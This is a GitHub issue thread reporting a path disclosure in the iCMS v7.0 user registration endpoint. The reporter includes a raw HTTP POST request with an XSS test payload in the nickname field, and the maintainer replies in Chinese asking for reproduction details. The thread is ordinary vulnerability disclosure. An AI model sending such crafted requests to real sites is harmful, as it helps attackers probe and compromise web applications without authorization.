### ISSUE TITLE
Path leaks exist at the idreamsoft iCMS v7.0 user registry

### ISSUE THREAD

**Issue by Yxxxxxxxxx** [idreamsoft/iCMS#16]
Path leaks exist at   the idreamsoft iCMS v7.0 user registry and can view the root path by  constructing paylod。

Paylod：
POST /iCMS-7.0/public/api.php?app=user HTTP/1.1
Host: 192.168.126.129
Content-Length: 168
Accept: application/json, text/javascript, */*; q=0.01
Origin: http://192.168.126.129
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: http://192.168.126.129/iCMS-7.0/public/api.php?app=user&do=register
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=37bk8eti3h5ref0q31q4tbfgh1; iCMS_admincp_seccode=396eae1aZaYvy5gcqqmRViSRzZdh3qbtq7h%252BhXHYUvYepPYF; iCMS_seccode=a3db47f6Cl6k4t%252BnnVEl%252FNmn2Ajp%252Ff6Eu2J3l7N%252FCXrIGV2x
Connection: close
username=1233%40qq.com&nickname="><script>alert(1)</script>gender=girl&password=123456&rstpassword=123456&seccode=VUWY&agreement=1&register_seccode=true&action=register

![image](https://user-images.githubusercontent.com/37363397/37874991-7ec72a8c-306b-11e8-9e59-fa988191fc09.png)

**Comment by idreamsoft** [comment]
我使用您提供的参数无法重现,您使用的是iCMS哪个版本
测试WEB环境是什么配置,测试结果图能否提供清晰些 或者能否提供下您的email
![2018-03-25_215727](https://user-images.githubusercontent.com/1290358/37875887-b0afb0d0-3077-11e8-8703-e8fd1abadcf5.png)

**Comment by Yxxxxxxxxx** [comment]
版本是ICMSv7.0.7 ，在用户注册处
![image](https://user-images.githubusercontent.com/37363397/38462216-927f33d0-3b15-11e8-9e8b-7f87fccaa61b.png)

**Comment by idreamsoft** [comment]
1.
